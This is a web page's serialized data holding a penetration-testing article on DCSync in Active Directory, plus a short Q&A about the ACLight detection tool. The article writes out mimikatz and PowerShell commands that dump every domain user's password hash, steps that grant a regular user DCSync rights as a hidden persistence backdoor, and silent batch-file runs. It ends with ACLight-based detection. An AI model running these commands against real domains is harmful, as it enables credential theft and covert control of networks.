[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fAo3fxT1qGcumbAro4U7fgUkMhHmb178HChVQzS2purM":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":33,"aiModel":30,"aiConfidence":30,"updatedAt":56,"createdAt":56,"_status":55},1284,"What tool can automatically detect DCSync backdoors and other privileged accounts in Active Directory?","ACLight (from CyberArk) is a tool that enumerates all Active Directory ACLs and flags privileged accounts, including those with DCSync permissions. It requires PowerShell v3.0 and domain user privileges, producing reports that identify 'Shadow Admins' not in high-privilege groups.\n\n---\n**Related reading:**\n- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\n- [Webmin\u003C=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\n- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\n- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)","\u003Cp>ACLight (from CyberArk) is a tool that enumerates all Active Directory ACLs and flags privileged accounts, including those with DCSync permissions. It requires PowerShell v3.0 and domain user privileges, producing reports that identify &#39;Shadow Admins&#39; not in high-privilege groups.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\u003Cbr>- [Webmin&lt;=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\u003Cbr>- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\u003Cbr>- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-tool-can-automatically-detect-dcsync-backdoors-and-other-privileged-account-1777477615528","DCSync detection, ACLight, Shadow Admin, ACL audit",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":20,"readingTime":32,"status":33,"publishedAt":34,"seo":35,"tags":39,"qaPairs":40,"meta":52,"updatedAt":53,"createdAt":54,"_status":55},299,"Domain Penetration - DCSync","domain-penetration-dcsync","Learn DCSync techniques for domain penetration: export user hashes, maintain persistence, and detect backdoors with open-source tools and methods.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>DCSync is a frequently used technique in domain penetration. This article will compile open-source materials, combine personal experience, and summarize methods for exploitation, defense, and detection.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Method to export all domain user hashes using DCSync\u003C\u002Fli>\u003Cli>Method to maintain persistence within the domain using DCSync\u003C\u002Fli>\u003Cli>Automated detection methods for DCSync backdoors\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Method to export all domain user hashes using DCSync\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>DCSync is a feature added to mimikatz in 2015, co-authored by Benjamin DELPY gentilkiwi and Vincent LE TOUX, capable of exporting hashes of all users within the domain.\u003C\u002Fp>\u003Cp>\u003Cstrong>Prerequisites:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Obtain permissions for any of the following users:\u003C\u002Fp>\u003Cul>\u003Cli>Users in the Administrators group\u003C\u002Fli>\u003Cli>Users in the Domain Admins group\u003C\u002Fli>\u003Cli>Users in the Enterprise Admins group\u003C\u002Fli>\u003Cli>Computer account of the domain controller\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Exploitation principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Utilize the DRS (Directory Replication Service) protocol to replicate user credentials from the domain controller via IDL_DRSGetNCChanges\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-drsr\u002Ff977faaa-673e-4f66-b9bf-48c640241d47\u003C\u002Fp>\u003Cp>\u003Cstrong>Implementation code:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fblob\u002Fmaster\u002Fmimikatz\u002Fmodules\u002Flsadump\u002Fkuhl_m_lsadump_dc.c#L27\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Ch4>1. Use mimikatz\u003C\u002Fh4>\u003Cp>Export hashes of all users in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export hash of the administrator account in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. PowerShell Implementation\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgist.github.com\u002Fmonoxgas\u002F9d238accd969550136db\u003C\u002Fp>\u003Cp>Calling the dcsync function in mimikatz.dll via Invoke-ReflectivePEinjection\u003C\u002Fp>\u003Cp>Export hashes of all users in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-DCSync -DumpForest | ft -wrap -autosize\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export the hash of the administrator account in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-DCSync -DumpForest -Users @(\"administrator\") | ft -wrap -autosize\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After obtaining the hashes of domain users, further exploitation can refer to previous articles:\u003C\u002Fp>\u003Cp>\"Domain Penetration - Implementation of Pass The Hash\"\u003C\u002Fp>\u003Cp>\"Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin mode)\"\u003C\u002Fp>\u003Cp>\"Domain Penetration - Pass The Hash &amp; Pass The Key\"\u003C\u002Fp>\u003Ch2>0x03 Methods for Maintaining Domain Privileges Using DCSync\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation Conditions:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Obtain the permissions of any of the following users:\u003C\u002Fp>\u003Cul>\u003Cli>Users within the Domain Admins group\u003C\u002Fli>\u003Cli>Users within the Enterprise Admins group\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Exploitation Principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add the following three ACEs (Access Control Entries) to a regular user in the domain:\u003C\u002Fp>\u003Cul>\u003Cli>DS-Replication-Get-Changes (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)\u003C\u002Fli>\u003Cli>DS-Replication-Get-Changes-All (GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)\u003C\u002Fli>\u003Cli>DS-Replication-Get-Changes (GUID: 89e95b76-444d-4c62-991a-0facbeda640c)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>This user will then gain the permission to export all user hashes in the domain using DCSync\u003C\u002Fp>\u003Cp>\u003Cstrong>Implementation Code:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1#L8270\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation Method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command to add ACEs is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Supplement:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Command to remove ACE:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For more information on ACLs, refer to the previous article: 'Penetration Techniques – Access Control List in Windows'\u003C\u002Fp>\u003Cp>The method to invoke DCSync using domain user test1 is as follows:\u003C\u002Fp>\u003Ch4>1. On a domain-joined host logged in as user test1, directly use the DCSync feature of mimikatz\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Use runas to log in as user test1, then perform DCSync\u003C\u002Fh4>\u003Cp>(1) Pop up a cmd window\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>echo 123456789 | runas \u002Fnoprofile \u002Fuser:test\\test1 cmd\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute the following command in the popped-up cmd window:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Execute without popping up a window\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>echo 123456789 | runas \u002Fnoprofile \u002Fuser:test\\test1 c:\\test\\1.bat\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The content of 1.bat is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>c:\\test\\mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit&gt;c:\\test\\1.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Similar tools include lsrunas, lsrunase, and CPAU\u003C\u002Fp>\u003Ch4>3. Using PowerShell to log in as user test1, then performing DCSync\u003C\u002Fh4>\u003Cp>(1) Launch cmd\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$uname=\"test\\test1\"\u003Cbr>$pwd=ConvertTo-SecureString \"12345678\" -AsPlainText –Force\u003Cbr>$cred=New-Object System.Management.Automation.PSCredential($uname,$pwd)\u003Cbr>Start-Process -FilePath \"cmd.exe\" -Credential $cred\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute the following command in the launched cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Implement without pop-up window\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$uname=\"test\\test1\"\u003Cbr>$pwd=ConvertTo-SecureString \"12345678\" -AsPlainText –Force\u003Cbr>$cred=New-Object System.Management.Automation.PSCredential($uname,$pwd)        \u003Cbr>Start-Process -FilePath \"c:\\test\\1.bat\" -Credential $cred\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The content of 1.bat is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>c:\\test\\mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit&gt;c:\\test\\1.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using wmic to log in as user test1 on the local machine will fail with the following error:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ERROR:\u003Cbr>Description = User credentials cannot be used for local connections\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Automated Detection Method for DCSync Backdoors\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Users with high privileges but not in high-privilege groups are referred to as Shadow Admins, such as the domain user test1 in 0x03. Simply querying members of high-privilege groups cannot reveal Shadow Admins within the domain.\u003C\u002Fp>\u003Cp>\u003Cstrong>Detection Principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Enumerate the ACLs of all users in Active Directory and flag privileged accounts.\u003C\u002Fp>\u003Cp>\u003Cstrong>Implementation Code:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fcyberark\u002FACLight\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation Conditions:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Powershell v3.0\u003C\u002Fli>\u003Cli>Domain User Privileges\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Detection Method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Execute Execute-ACLight2.bat from the project\u003C\u002Fp>\u003Cp>Three files will be generated:\u003C\u002Fp>\u003Cul>\u003Cli>Privileged Accounts - Layers Analysis.txt\u003C\u002Fli>\u003Cli>Privileged Accounts Permissions - Final Report.csv\u003C\u002Fli>\u003Cli>Privileged Accounts Permissions - Irregular Accounts.csv\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The files will display all privileged accounts\u003C\u002Fp>\u003Cp>Testing shows that ACLight can detect user test1 with DCSync permissions added\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the exploitation of DCSync in domain penetration and automated detection methods. From a defensive perspective, it is recommended to use ACLight to detect user ACLs in the domain environment\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",4,"published","2026-02-02T07:25:19.682Z",{"title":36,"description":14,"keywords":37,"ogImage":30,"canonicalUrl":30,"noIndex":38},"DCSync Domain Penetration: Export Hashes & Persistence","DCSync, domain penetration, hash export, persistence, detection, mimikatz, PowerShell",false,[],{"docs":41,"hasNextPage":51},[42,43,44,45,46,4,47,48,49,50],1289,1288,1287,1286,1285,1283,1282,1281,1280,true,{"title":30,"description":30,"image":30},"2026-07-24T02:07:12.184Z","2026-07-23T16:02:42.706Z","draft","2026-07-23T16:17:52.782Z"]